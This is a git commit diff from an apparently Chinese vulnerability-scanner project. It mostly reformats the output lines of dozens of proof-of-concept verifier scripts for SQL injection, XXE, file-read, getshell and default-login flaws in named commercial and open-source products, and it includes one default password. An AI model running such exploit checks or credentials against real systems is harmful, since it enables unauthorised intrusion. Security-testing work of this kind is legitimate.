add sangfor exec poc

This commit is contained in:
Lucifer1993
2017-07-25 23:23:16 +08:00
parent 4b70e15e1d
commit 73d10a845d
50 changed files with 152 additions and 54 deletions

View File

@@ -29,7 +29,7 @@ class pkpmbs_MsgList_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"GAOJIMicrosoft" in req.text: if r"GAOJIMicrosoft" in req.text:
cprint("[+]存在pkpmbs建设工程质量监督系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在pkpmbs建设工程质量监督系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -29,7 +29,7 @@ class pkpmbs_addresslist_keyword_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"GAOJIMicrosoft" in req.text: if r"GAOJIMicrosoft" in req.text:
cprint("[+]存在pkpmbs建设工程质量监督系统注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在pkpmbs建设工程质量监督系统注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -29,7 +29,7 @@ class acsoft_GetFileContent_fileread_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.headers["Content-Type"] == "application/xml": if req.headers["Content-Type"] == "application/xml":
cprint("[+]存在安财软件GetFileContent任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在安财软件GetFileContent任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -29,7 +29,7 @@ class acsoft_GetFile_fileread_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.headers["Content-Type"] == "application/xml": if req.headers["Content-Type"] == "application/xml":
cprint("[+]存在安财软件GetFile任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在安财软件GetFile任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -28,7 +28,7 @@ class acsoft_GetXMLList_fileread_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.headers["Content-Type"] == "application/xml": if req.headers["Content-Type"] == "application/xml":
cprint("[+]存在安财软件GetXMLList任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在安财软件GetXMLList任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -7,6 +7,7 @@ author: Lucifer
description: /phpmyadmin任意用户名密码登录,通过低权限提权可获取root密码插入shell。 description: /phpmyadmin任意用户名密码登录,通过低权限提权可获取root密码插入shell。
''' '''
import sys import sys
import json
import requests import requests
import warnings import warnings
from termcolor import cprint from termcolor import cprint
@@ -30,7 +31,7 @@ class autoset_phpmyadmin_unauth_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"li_server_type" in req.text: if r"li_server_type" in req.text:
cprint("[+]存在韩国autoset建站程序phpmyadmin任意登录漏洞...(高危)\tpayload: "+vulnurl, "red") cprint("[+]存在韩国autoset建站程序phpmyadmin任意登录漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -30,7 +30,7 @@ class cmseasy_header_detail_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在cmseasy header.php 报错注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在cmseasy header.php 报错注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -28,7 +28,7 @@ class ecshop_flow_orderid_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在ecshop3.0 flow.php 参数order_id注入漏洞...(高危)\tpayload: "+vulnurl+ "\tpost: "+json.dumps(post_data), "red") cprint("[+]存在ecshop3.0 flow.php 参数order_id注入漏洞...(高危)\tpayload: "+vulnurl+ "\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -30,7 +30,7 @@ class eyou_admin_id_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False) req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
if time.time() - start_time >= 6: if time.time() - start_time >= 6:
cprint("[+]存在亿邮Defender系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red") cprint("[+]存在亿邮Defender系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -55,7 +55,7 @@ class gobetters_multi_sqli_BaseVerify:
} }
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
vulnurl = self.url + "/web/department/departmentsave.php" vulnurl = self.url + "/web/department/departmentsave.php"
post_data = { post_data = {
@@ -66,7 +66,7 @@ class gobetters_multi_sqli_BaseVerify:
} }
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
vulnurl = self.url + "/web/monitor/monitormentsave.php" vulnurl = self.url + "/web/monitor/monitormentsave.php"
post_data = { post_data = {
@@ -77,7 +77,7 @@ class gobetters_multi_sqli_BaseVerify:
} }
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
vulnurl = self.url + "/web/users/result.php" vulnurl = self.url + "/web/users/result.php"
post_data = { post_data = {
@@ -85,7 +85,7 @@ class gobetters_multi_sqli_BaseVerify:
} }
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -32,7 +32,7 @@ class kxmail_login_server_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if time.time() - start_time >= 6: if time.time() - start_time >= 6:
cprint("[+]存在科信邮件系统login.server.php 时间盲注漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在科信邮件系统login.server.php 时间盲注漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -7,6 +7,7 @@ author: Lucifer
description: live800使用了xfire实现webservice,xfire存在一个XXE可以直接利用获取远程敏感文件信息。 description: live800使用了xfire实现webservice,xfire存在一个XXE可以直接利用获取远程敏感文件信息。
''' '''
import sys import sys
import json
import requests import requests
import warnings import warnings
from termcolor import cprint from termcolor import cprint
@@ -46,7 +47,7 @@ class live800_services_xxe_BaseVerify():
try: try:
req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False) req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在live800在线客服系统XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\t\tpost: "+post_data, "red") cprint("[+]存在live800在线客服系统XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -42,7 +42,7 @@ class live800_sta_export_sqli_BaseVerify:
req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False) req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red") cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")
@@ -69,7 +69,7 @@ class live800_sta_export_sqli_BaseVerify:
req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False) req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red") cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")
@@ -89,7 +89,7 @@ class live800_sta_export_sqli_BaseVerify:
req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False) req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red") cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")
@@ -109,7 +109,7 @@ class live800_sta_export_sqli_BaseVerify:
req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False) req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red") cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -31,7 +31,7 @@ class opensns_index_getshell_BaseVerify:
shellurl = req.text[pos::].replace("\\","").strip('"}') shellurl = req.text[pos::].replace("\\","").strip('"}')
req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False) req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
if r"Configuration File (php.ini) Path" in req2.text: if r"Configuration File (php.ini) Path" in req2.text:
cprint("[+]存在opensns index.php 前台getshell漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data)+"\tshell地址: "+shellurl, "red") cprint("[+]存在opensns index.php 前台getshell漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)+"\nshell地址: "+shellurl, "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -35,7 +35,7 @@ class clib_kindaction_fileread_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.status_code == 200 and r"system" in req.text: if req.status_code == 200 and r"system" in req.text:
cprint("[+]存在五车图书管系统kindaction任意文件遍历漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在五车图书管系统kindaction任意文件遍历漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -30,7 +30,7 @@ class eis_menu_left_edit_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
cprint("[+]存在蓝凌EIS智慧协同平台menu_left_edit.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在蓝凌EIS智慧协同平台menu_left_edit.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -50,7 +50,7 @@ class hjsoft_sqli_BaseVerify:
try: try:
req2 = requests.post(post_url, headers=headers, data=post_data, timeout=10, verify=False) req2 = requests.post(post_url, headers=headers, data=post_data, timeout=10, verify=False)
if time.time() - start_time >= 6: if time.time() - start_time >= 6:
cprint("[+]存在宏景EHR系统 SQL注入漏洞...(高危)\t\tpayload: "+post_url+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在宏景EHR系统 SQL注入漏洞...(高危)\t\tpayload: "+post_url+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -28,7 +28,7 @@ class mainone_SupplyList_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"JIMicrosoft" in req.text: if r"JIMicrosoft" in req.text:
cprint("[+]存在铭万B2B SupplyList SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在铭万B2B SupplyList SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -29,7 +29,7 @@ class phpmyadmin_setup_lfi_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"boot loader" in req.text: if r"boot loader" in req.text:
cprint("[+]存在PhpMyAdmin2.8.0.3无需登录任意文件包含导致代码执行漏洞(WINDOWS)...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在PhpMyAdmin2.8.0.3无需登录任意文件包含导致代码执行漏洞(WINDOWS)...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -30,7 +30,7 @@ class qibocms_search_code_exec_BaseVerify:
} }
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"Configuration File (php.ini) Path" in req.text: if r"Configuration File (php.ini) Path" in req.text:
cprint("[+]存在qibo分类系统search.php 代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在qibo分类系统search.php 代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -31,7 +31,7 @@ class seacms_order_code_exec_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"comment.php" in req.text: if r"comment.php" in req.text:
cprint("[+]存在seacms 6.45 search.php order参数前台代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在seacms 6.45 search.php order参数前台代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -28,7 +28,7 @@ class trs_infogate_register_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"CUSTOMERUSER" in req.text and r"CUSTOMERUSERID" in req.text: if r"CUSTOMERUSER" in req.text and r"CUSTOMERUSERID" in req.text:
cprint("[+]存在trs infogate插件 任意注册漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在trs infogate插件 任意注册漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -35,7 +35,7 @@ class trs_infogate_xxe_BaseVerify:
time.sleep(6) time.sleep(6)
reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False) reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
if md5_str in reqr.text: if md5_str in reqr.text:
cprint("[+]存在trs infogate插件 XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在trs infogate插件 XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -34,7 +34,7 @@ class trs_lunwen_papercon_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if time.time() - start_time >= 6: if time.time() - start_time >= 6:
cprint("[+]存在TRS学位论文系统papercon处SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在TRS学位论文系统papercon处SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -7,6 +7,7 @@ author: Lucifer
description: TRS wcm系统中存在"依申请公开"这个默认用户,默认密码是trsadmin,可直接登录。 description: TRS wcm系统中存在"依申请公开"这个默认用户,默认密码是trsadmin,可直接登录。
''' '''
import sys import sys
import json
import requests import requests
import warnings import warnings
from termcolor import cprint from termcolor import cprint
@@ -30,7 +31,7 @@ class trs_wcm_default_user_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"WCM IMPORTS BEGIN" in req.text and r"main.jsp" in req.text: if r"WCM IMPORTS BEGIN" in req.text and r"main.jsp" in req.text:
cprint("[+]存在TRS wcm系统默认账户漏洞...(高危)\tpayload: "+vulnurl+"\tpost: 依申请公开:trsadmin", "red") cprint("[+]存在TRS wcm系统默认账户漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -29,7 +29,7 @@ class umail_sessionid_access_BaseVerify:
try: try:
req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False) req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
if r'<meta http-equiv="refresh" content="0; URL=index.php">' in req.text: if r'<meta http-equiv="refresh" content="0; URL=index.php">' in req.text:
cprint("[+]存在umail sessionid登录漏洞...(中危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "yellow") cprint("[+]存在umail sessionid登录漏洞...(中危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "yellow")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -35,7 +35,7 @@ class wizbank_usr_id_sqli_BaseVerify:
if r"true" in reqlst[0] and r"false" in reqlst[1]: if r"true" in reqlst[0] and r"false" in reqlst[1]:
if len(req.text) < 50: if len(req.text) < 50:
cprint("[+]存在wizBank学习系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red") cprint("[+]存在wizBank学习系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
if __name__ == "__main__": if __name__ == "__main__":
warnings.filterwarnings("ignore") warnings.filterwarnings("ignore")

View File

@@ -48,7 +48,7 @@ class wordpress_plugin_mailpress_rce_BaseVerify:
shellurl = self.url + "/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id="+searchid shellurl = self.url + "/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id="+searchid
req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False) req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
if r"Configuration File (php.ini) Path" in req2.text: if r"Configuration File (php.ini) Path" in req2.text:
cprint("[+]存在wordpress 插件mailpress远程代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data)+"\tshellurl: "+shellurl, "red") cprint("[+]存在wordpress 插件mailpress远程代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)+"\nshellurl: "+shellurl, "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -40,8 +40,7 @@ class wordpress_restapi_sqli_BaseVerify:
if status != 401 and status != 400: if status != 401 and status != 400:
cprint("[+]存在wordpress rest api权限失效导致内容注入漏洞...(高危)\tpayload: "+vulnurl, "red") cprint("[+]存在wordpress rest api权限失效导致内容注入漏洞...(高危)\tpayload: "+vulnurl, "red")
except Exception as e: except:
print(e)
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")
if __name__ == "__main__": if __name__ == "__main__":

View File

@@ -34,7 +34,7 @@ class xplus_2003_getshell_BaseVerify:
verifyurl = self.url + "/shtml/php.php;.shtml" verifyurl = self.url + "/shtml/php.php;.shtml"
req2 = requests.get(verifyurl, headers=headers, timeout=10, verify=False) req2 = requests.get(verifyurl, headers=headers, timeout=10, verify=False)
if req2.status_code == 200 and r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text: if req2.status_code == 200 and r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
cprint("[+]存在xplus npmaker 2003系统GETSHELL漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在xplus npmaker 2003系统GETSHELL漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -31,7 +31,7 @@ class yonyou_a8_CmxUser_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if time.time() - start_time >= 6: if time.time() - start_time >= 6:
cprint("[+]存在用友优普a8 CmxUserSQL时间盲注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在用友优普a8 CmxUserSQL时间盲注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -37,7 +37,7 @@ class yonyou_a8_personService_xxe_BaseVerify:
time.sleep(6) time.sleep(6)
reqr = requests.get(eye_url, timeout=10, verify=False) reqr = requests.get(eye_url, timeout=10, verify=False)
if md5_str in reqr.text: if md5_str in reqr.text:
cprint("[+]存在用友致远A8协同系统 Blind XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在用友致远A8协同系统 Blind XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

View File

@@ -33,7 +33,7 @@ class yonyou_ehr_resetpwd_sqli_BaseVerify:
try: try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if time.time() - start_time >= 6: if time.time() - start_time >= 6:
cprint("[+]存在用友EHR系统 ResetPwd.jsp SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red") cprint("[+]存在用友EHR系统 ResetPwd.jsp SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
except: except:
cprint("[-] "+__file__+"====>连接超时", "cyan") cprint("[-] "+__file__+"====>连接超时", "cyan")

2
